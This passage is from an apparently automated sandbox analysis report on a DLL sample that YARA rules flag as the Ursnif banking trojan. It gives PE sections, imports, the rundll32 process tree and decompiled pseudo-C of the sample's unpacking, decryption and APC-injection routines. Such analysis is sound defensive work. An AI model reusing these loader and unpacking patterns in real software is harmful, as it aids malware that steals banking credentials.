IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x185f2	0x18600	False	0.670042067308	data	6.53345039933	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1a000	0x64	0x200	False	0.16796875	data	1.0662581269	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x1000	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x1c000	0x20b3	0x2200	False	0.359834558824	data	2.96025706595	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data	0x1f000	0x7b2	0x800	False	0.45703125	data	4.70767794561	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
user32.dll	GetActiveWindow, SetWindowsHookExA, GetLayeredWindowAttributes
kernel32.dll	GetProcAddress, LoadLibraryA, VirtualProtect, VirtualAlloc, lstrlenA, lstrcatA, lstrcmpA, GetEnvironmentVariableW
ole32.dll	OleInitialize, OleQueryCreateFromData, IIDFromString, CLIPFORMAT_UserUnmarshal, OleCreateEmbeddingHelper, HDC_UserSize
msimg32.dll	AlphaBlend, TransparentBlt
comdlg32.dll	PageSetupDlgA, PrintDlgA
oledlg.dll	OleUICanConvertOrActivateAs, OleUIChangeSourceW, OleUIConvertA
comctl32.dll	CreateStatusWindow, LBItemFromPt, DPA_Create, FlatSB_ShowScrollBar, ImageList_GetFlags
oleacc.dll	IID_IAccessible, LresultFromObject
version.dll	VerFindFileW, VerInstallFileA, VerQueryValueA, VerQueryValueW
gdiplus.dll	GdipEnumerateMetafileDestPointI, GdipCreateBitmapFromHBITMAP, GdipSetPenUnit, GdipGetImageEncoders, GdipGetPathPointsI
winspool.drv	FindNextPrinterChangeNotification, ConnectToPrinterDlg, SetPrinterDataW, GetPrinterW, DeletePrinterDataExW
shell32.dll	SHGetSpecialFolderPathA
advapi32.dll	GetKernelObjectSecurity, CryptEnumProviderTypesA, RegQueryValueExW, RegisterIdleTask

Exports

Name	Ordinal	Address
DllServer	1	0x1000447b

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5584 Parent PID: 5688

General

Start time:	00:58:18
Start date:	06/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll'
Imagebase:	0x810000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000002.625111885.0000000000D90000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 1936 Parent PID: 5584

General

Start time:	00:58:18
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll',#1
Imagebase:	0x870000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4992 Parent PID: 5584

General

Start time:	00:58:18
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll,DllServer
Imagebase:	0x230000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.274936732.0000000002600000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 660 Parent PID: 1936

General

Start time:	00:58:18
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll',#1
Imagebase:	0x230000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.254342538.0000000004990000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5584 Parent PID: 5688 loaddll32.exeCOMMON

Executed Functions

Function 1000163F, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000163F(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E10001850();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E100018F4(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E100012DC(E1000135A,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8); // executed
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E10001538(_t44,  &_a4) != 0) {
					 *0x10004138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x10004138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E10001DE1(_t48 + _t14);
				 *0x10004138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E10001DFC(_t43);
				goto L11;
			}

0x10001646
0x1000164f
0x10001652
0x10001742
0x10001742
0x10001659
0x1000165d
0x10001663
0x10001671
0x10001672
0x10001675
0x10001678
0x10001681
0x10001684
0x1000168a
0x1000168d
0x10001694
0x1000173f
0x00000000
0x1000173f
0x1000169e
0x100016ef
0x100016ef
0x10001705
0x1000170a
0x10001732
0x1000170c
0x1000170f
0x10001717
0x1000171a
0x10001721
0x10001721
0x10001728
0x10001728
0x10001735
0x1000173b
0x1000173d
0x1000173d
0x00000000
0x1000173b
0x100016ab
0x100016e9
0x00000000
0x100016e9
0x100016ad
0x100016b0
0x100016b9
0x100016bb
0x100016bf
0x100016e1
0x100016e1
0x00000000
0x100016e1
0x100016c1
0x100016c6
0x100016cd
0x100016d2
0x00000000
0x00000000
0x100016d7
0x100016da
0x00000000

APIs

Part of subcall function 10001850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000164B,76D263F0), ref: 1000185F
Part of subcall function 10001850: GetVersion.KERNEL32 ref: 1000186E
Part of subcall function 10001850: GetCurrentProcessId.KERNEL32 ref: 10001885
Part of subcall function 10001850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 1000189E

GetSystemTime.KERNEL32(?,00000000,76D263F0), ref: 1000165D
SwitchToThread.KERNEL32 ref: 10001663

Part of subcall function 100018F4: VirtualAlloc.KERNELBASE(00000000,1000167D,00003000,00000004,?,?,1000167D,00000000), ref: 1000194A
Part of subcall function 100018F4: memcpy.NTDLL(?,?,1000167D,?,?,1000167D,00000000), ref: 100019DC
Part of subcall function 100018F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,1000167D,00000000), ref: 100019F7

Sleep.KERNELBASE(00000000,00000000), ref: 10001684
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 100016B9
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 100016D7
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 1000170F
GetExitCodeThread.KERNELBASE(00000000,?), ref: 10001721
CloseHandle.KERNEL32(00000000), ref: 10001728
GetLastError.KERNEL32(?,00000000), ref: 10001730
GetLastError.KERNEL32 ref: 1000173D

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: 1d94a8f484d99c584117039eeacf9866d0a4ad351db0f72dece7264e9d25b94c
Instruction ID: 51f1b5d7b5d62603e0b6ca74e6a4c687eacd357270907eacbd85172d1a2e8795
Opcode Fuzzy Hash: 1d94a8f484d99c584117039eeacf9866d0a4ad351db0f72dece7264e9d25b94c
Instruction Fuzzy Hash: 2D318F76901225ABE711EBA58C849DF77FDEF843D0B124226F914D3148EB34DB40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10001AFA, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000410c;
						if( *0x1000410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004118;
								if( *0x10004118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000410c);
						}
						HeapDestroy( *0x10004110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x10004110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x10004130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E100012DC(E1000111A, E100015EE(_a12, 1, 0x10004118, _t41));
							 *0x1000410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x10001afd
0x10001b09
0x10001b0b
0x10001b0e
0x10001b84
0x10001b8a
0x10001b8c
0x10001b8e
0x10001b94
0x10001b96
0x10001b9b
0x10001b9e
0x10001ba9
0x10001bab
0x00000000
0x00000000
0x10001bad
0x10001bb0
0x10001bb2
0x00000000
0x00000000
0x00000000
0x10001bb2
0x10001bba
0x10001bba
0x10001bc6
0x10001bc6
0x10001b10
0x10001b11
0x10001b31
0x10001b37
0x10001b39
0x10001b3e
0x10001b7a
0x10001b7a
0x10001b40
0x10001b48
0x10001b4f
0x10001b59
0x10001b65
0x10001b6c
0x10001b71
0x10001b76
0x00000000
0x10001b76
0x10001b71
0x10001b3e
0x10001b11
0x10001bd3

APIs

InterlockedIncrement.KERNEL32(10004108), ref: 10001B1C
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001B31

Part of subcall function 100012DC: CreateThread.KERNEL32 ref: 100012F3
Part of subcall function 100012DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001308
Part of subcall function 100012DC: GetLastError.KERNEL32(00000000), ref: 10001313
Part of subcall function 100012DC: TerminateThread.KERNEL32(00000000,00000000), ref: 1000131D
Part of subcall function 100012DC: CloseHandle.KERNEL32(00000000), ref: 10001324
Part of subcall function 100012DC: SetLastError.KERNEL32(00000000), ref: 1000132D

InterlockedDecrement.KERNEL32(10004108), ref: 10001B84
SleepEx.KERNEL32(00000064,00000001), ref: 10001B9E
CloseHandle.KERNEL32 ref: 10001BBA
HeapDestroy.KERNEL32 ref: 10001BC6

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: b2735cd62b98c0fff9eadb96ecfab59fc7d8990f65d57987f5a6912bdf7ccd39
Instruction ID: f0df8185a4137bf23340b4e7eb087222ae8a4cbb436f36e741c86f19ce9e809b
Opcode Fuzzy Hash: b2735cd62b98c0fff9eadb96ecfab59fc7d8990f65d57987f5a6912bdf7ccd39
Instruction Fuzzy Hash: 922190B5601216AFF701DF69CCC4ACA7FE8FB642E07128129FA05D3168EB708D808B94

Uniqueness

Uniqueness Score: -1.00%

Function 100012DC, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100012DC(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x1000414c, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x100012f3
0x100012f9
0x100012fd
0x10001308
0x10001310
0x10001319
0x1000131d
0x10001324
0x1000132b
0x1000132d
0x10001333
0x10001310
0x10001337

APIs

CreateThread.KERNEL32 ref: 100012F3
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001308
GetLastError.KERNEL32(00000000), ref: 10001313
TerminateThread.KERNEL32(00000000,00000000), ref: 1000131D
CloseHandle.KERNEL32(00000000), ref: 10001324
SetLastError.KERNEL32(00000000), ref: 1000132D

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: f944589a858edab2219560e62326191baa7f7a8351923321239c7166ab578a1d
Instruction ID: 31004d63c2960ea31e2c824d7a0ae826113ff2aaace5ecc64d275acbf5e6dd3f
Opcode Fuzzy Hash: f944589a858edab2219560e62326191baa7f7a8351923321239c7166ab578a1d
Instruction Fuzzy Hash: AAF0F232606631FBF6139BA08C98F9FBBADFB08BD1F01C404FA1591168CB3189109BA5

Uniqueness

Uniqueness Score: -1.00%

Function 100018F4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E100018F4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x10004130;
				_t39 = E10001F5D(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x1000414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x100051a7; // 0x100051a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E100018C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x1000414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x100018fb
0x1000190b
0x10001912
0x10001915
0x1000192a
0x10001931
0x10001936
0x10001947
0x1000194a
0x10001952
0x10001955
0x100019ff
0x1000195b
0x1000195b
0x1000195f
0x100019c7
0x10001961
0x10001961
0x10001964
0x10001966
0x1000196e
0x10001971
0x10001974
0x1000197c
0x10001984
0x10001985
0x10001986
0x1000198d
0x1000198d
0x100019a1
0x100019a6
0x100019af
0x100019b6
0x100019b9
0x100019bd
0x100019c2
0x00000000
0x00000000
0x10001979
0x10001979
0x100019c4
0x100019d1
0x100019e6
0x100019d3
0x100019dc
0x100019e1
0x100019f7
0x100019f7
0x10001a06
0x10001a0c

APIs

VirtualAlloc.KERNELBASE(00000000,1000167D,00003000,00000004,?,?,1000167D,00000000), ref: 1000194A
memcpy.NTDLL(?,?,1000167D,?,?,1000167D,00000000), ref: 100019DC
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,1000167D,00000000), ref: 100019F7

Strings

Mar 9 2021, xrefs: 1000197C

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 9 2021
API String ID: 4010158826-2159264323
Opcode ID: 7b4b9413683c0ee93ca57d36818f05a47077ad882414d040b2bcd6576e39adc5
Instruction ID: d25fb31f2c2add74eafa799964551cc2416acfdb7abcc9e218ddf36d438f9e1f
Opcode Fuzzy Hash: 7b4b9413683c0ee93ca57d36818f05a47077ad882414d040b2bcd6576e39adc5
Instruction Fuzzy Hash: 4D315271E0111A9FEB01CF99C891ADEBBF5EF48384F108169E904A7259D771AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000111A, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1000111A(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E1000163F(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x10001123
0x10001128
0x10001136
0x1000113b
0x1000113b
0x10001141
0x10001146
0x1000114a
0x1000114e
0x1000114e
0x10001158
0x10001161

APIs

GetCurrentThread.KERNEL32 ref: 1000111D
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 10001128
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 1000113B
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 1000114E

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: c35cabef654aae5fe09134992651e52fd0a70a53666a0e792eef5a60e0c71ab1
Instruction ID: 4c0cec3966cfd65f316416e497d44ff5eb1b0779e4299dd3e4543c5f6ab01fef
Opcode Fuzzy Hash: c35cabef654aae5fe09134992651e52fd0a70a53666a0e792eef5a60e0c71ab1
Instruction Fuzzy Hash: 91E092712066216BF302AB294C85EEB679DDF953F0B028225F620D22E8CF659D0286A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000135A, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000135A() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				void* _t24;
				long _t25;
				int _t26;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x10004150;
				if( *0x1000412c > 5) {
					_t16 = _t15 + 0x100050f9;
				} else {
					_t16 = _t15 + 0x100050b1;
				}
				E10001FE7(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				_t24 = E10001414( &_v32,  &_v16,  *0x1000414c ^ 0xfd7cd1cf); // executed
				if(_t24 == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x10004138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					if(E1000102F(_t39, _t11,  &_v32,  &_v36) == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x10004138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E1000200D(_t44, _t32 + 4);
						}
					}
					_t25 = E10001E11(_v28);
				}
				ExitThread(_t25);
			}

0x10001360
0x10001371
0x1000137b
0x10001373
0x10001373
0x10001373
0x10001382
0x1000138b
0x10001390
0x100013a7
0x100013ae
0x10001405
0x100013b0
0x100013b6
0x100013bc
0x100013ca
0x100013d5
0x100013d7
0x100013e3
0x100013e5
0x100013f4
0x100013e7
0x100013ed
0x100013ed
0x100013e5
0x100013fc
0x100013fc
0x10001407

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 100013B6
ExitThread.KERNEL32 ref: 10001407

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: bbc03089cd780e3a685a91eb4c0c862dad5948ab76aa5244e081fc2d8405439e
Instruction ID: 2ce771c5e16d54c3ab671480280001d27b24c2f2c6965729a5a09e13ad1247cb
Opcode Fuzzy Hash: bbc03089cd780e3a685a91eb4c0c862dad5948ab76aa5244e081fc2d8405439e
Instruction Fuzzy Hash: D71149B1908245ABF711DBA4CC899CBB7ECEB483C0F02482AF555D7169EB30E6858B55

Uniqueness

Uniqueness Score: -1.00%

Function 10001FE7, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E10001FE7(void* __eax, intOrPtr _a4) {

				 *0x10004148 =  *0x10004148 & 0x00000000;
				_push(0);
				_push(0x10004144);
				_push(1);
				_push(_a4);
				 *0x10004140 = 0xc; // executed
				L10001BD6(); // executed
				return __eax;
			}

0x10001fe7
0x10001fee
0x10001ff0
0x10001ff5
0x10001ff7
0x10001ffb
0x10002005
0x1000200a

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(10001387,00000001,10004144,00000000), ref: 10002005

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 797134a9b1f988486b15df9cd10c437d68bca56e1d0ccba6a6193b38078adc0e
Instruction ID: 77fc3a402b1b28792d7a6ab77bf10cd6ea7ed93b7dc72413e294461ac678640d
Opcode Fuzzy Hash: 797134a9b1f988486b15df9cd10c437d68bca56e1d0ccba6a6193b38078adc0e
Instruction Fuzzy Hash: 87C048F8140310ABF620DB019C86FC57AA2B7A4789F224508F200262E8DBB920988A2D

Uniqueness

Uniqueness Score: -1.00%

Function 10001DFC, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001DFC(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x10004110, 0, _a4); // executed
				return _t2;
			}

0x10001e08
0x10001e0e

APIs

RtlFreeHeap.NTDLL(00000000,?,100015AD,00000000,?,?,?,100016A9,?), ref: 10001E08

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1fc4ddb0927f6eacf2c228d147bb437f356429c7c4a52989a9f03a222e5aa223
Instruction ID: b2da5a76dde170a942c471694b92b9b742169823b4704214b2d097e37b55d36f
Opcode Fuzzy Hash: 1fc4ddb0927f6eacf2c228d147bb437f356429c7c4a52989a9f03a222e5aa223
Instruction Fuzzy Hash: 7CB01271440110EBFA128B00CD45F067F22B764740F01C410F300000B8C6318460FB18

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10001850, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001850() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x10004130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x1000413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x1000412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x10004128 = _t5;
						 *0x10004130 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x10004124 = _t6;
						if(_t6 == 0) {
							 *0x10004124 =  *0x10004124 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x10001851
0x1000185f
0x10001867
0x1000186c
0x100018be
0x100018be
0x1000186e
0x10001876
0x1000187e
0x1000187e
0x100018ba
0x100018bc
0x00000000
0x00000000
0x00000000
0x10001878
0x1000187a
0x10001880
0x10001880
0x10001885
0x10001893
0x10001898
0x1000189e
0x100018a6
0x100018ab
0x100018ad
0x100018ad
0x100018b7
0x1000187c
0x1000187c
0x00000000
0x1000187c
0x1000187a

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000164B,76D263F0), ref: 1000185F
GetVersion.KERNEL32 ref: 1000186E
GetCurrentProcessId.KERNEL32 ref: 10001885
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 1000189E

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: ad5392e4f8523c6bff8dabd249a7cc4530ce31fe89c4eb97e7685ee26d633860
